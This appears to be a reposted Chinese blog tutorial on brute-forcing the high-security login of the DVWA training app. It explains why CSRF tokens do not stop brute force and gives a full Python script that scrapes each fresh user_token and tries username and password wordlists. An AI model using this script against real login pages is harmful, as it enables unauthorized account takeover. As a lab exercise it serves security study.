https://xiaochuhe.blog.csdn.net/article/details/122546973

简介: https://xiaochuhe.blog.csdn.net/article/details/122546973

本文转载:https://xiaochuhe.blog.csdn.net/article/details/122546973

高机中加入Token预防CSRF,重定向我们通过bp抓包发现多了一个user_token参数:

图片.png

在这里插入图片描述
继续使用上面的爆破方式,发现全部被重定向:

图片.png

Token机制:

Token是服务端生成的一串字符串,以作客户端进行请求的一个令牌,当第一次登录后,服务器生成一个Token便将此Token返回给客户端,以后客户端只需带上这个Token前来请求数据即可,无需再次带上用户名和密码。

Token可以用于防护CSRF攻击,但不可以预防暴力破解,因为每次会话的Token都会发送至前端,只需要递归地在前端接收Token作为下次访问的Token值就可以实施暴力破解了。
代码如下:

#dvwa(hign)暴力破解程序
import re
import requests
with open("user.txt",'r') as file:
    for username in file:
        #print (username.strip())
        with open("password.txt",'r') as passwd:
            for password in passwd:
                #print (password.strip())
                url = "http://x.x.x.x/dvwa/dvwa/vulnerabilities/brute/"
                header = {
                'Cookie':'security=high; request_token=78gUEJrz2WPS3xN1XfqiXeGy2tgiHd8CxpzVAOSavBj4c8lA; pro_end=-1; ltd_end=-1; serverType=apache; order=id%20desc; memSize=1837; bt_user_info=%7B%22status%22%3Atrue%2C%22msg%22%3A%22%u83B7%u53D6%u6210%u529F%21%22%2C%22data%22%3A%7B%22username%22%3A%22151****1573%22%7D%7D; a3446a883d49d56e7e3ab64c9f2af2ad=d5a8f18a-489e-4beb-bca0-ee0272edea2f.b_FsvtXQq2JqFu6tBwn3MguJILs; JSESSIONID=B3B6110EF5A065700776C0554D642C4B; PHPSESSID=9cujklrgmm4qlsnhus8pa5ihbb'
                }
                r = requests.get(url=url,headers=header)
                #print (r.text)
                token = re.findall("<input type='hidden' name='user_token' value='(.*?)' />",r.text)[0]
                #print (token)
                url_last = url + '?username=' + username.strip() + '&password=' + password.strip() + '&Login=Login&user_token=' +token
                #print (url_last)
                res = requests.get(url=url_last,headers=header)
                #print (res.url)
                #print (res.text)
                if not re.findall('Username and/or password incorrect.',res.text):
                    print ('破解成功啦,杀世子,夺青鸟!')
                    print ("用户名是:", username.strip())
                    print ("密码是:", password.strip())

输出结果:
图片.png

相关文章
|
8月前
https://blog.csdn.net/njpkhuan/article/details/100563673?spm=1001.2014.3001.5502
https://blog.csdn.net/njpkhuan/article/details/100563673?spm=1001.2014.3001.5502
|
2月前
|
C++
【C/C++ 编程 入门篇】 if条件判断表达式的使用教程
https://developer.aliyun.com/article/1465430
20 0
|
13天前
|
Java Unix Linux
https://developer.aliyun.com/article/1495767
https://developer.aliyun.com/article/1495767
|
2月前
|
JSON 前端开发 数据格式
https://tigerhhzz.blog.csdn.net/article/details/129961946?spm=1001.2014.3001.5502
https://tigerhhzz.blog.csdn.net/article/details/129961946?spm=1001.2014.3001.5502
11 0
|
4月前
https://developer.aliyun.com/article/1417518
https://developer.aliyun.com/article/1417518
30 0
|
4月前
|
XML Java 数据格式
javaweb实训第五天下午——xml配置文件约束报错问题
问题描述: 如果电脑连不上网,或者网速不好可能会造成Spring框架中xml配置文件出现错误。但是这个错误不影响项目的运行的;
21 0
|
5月前
|
存储 缓存 算法
计算机原理组成篇 (2)
主存-辅存层次 原理:局部性原理 实现:主存之外增加辅助存储器(磁盘、SD卡、U盘等) 目的:解决主存容量不足的问题
97 0
|
9月前
|
Serverless
7-9 拯救外星人
你的外星人朋友不认得地球上的加减乘除符号,但是会算阶乘 —— 正整数 N 的阶乘记为 “N!”,是从 1 到 N 的连乘积。所以当他不知道“5+7”等于多少时,如果你告诉他等于“12!”,他就写出了“479001600”这个答案。
139 0
|
2月前
|
前端开发
webpack如何设置devServer启动项目为https协议
webpack如何设置devServer启动项目为https协议
181 0
|
5天前
|
存储 算法 安全
[计算机网络]---Https协议
[计算机网络]---Https协议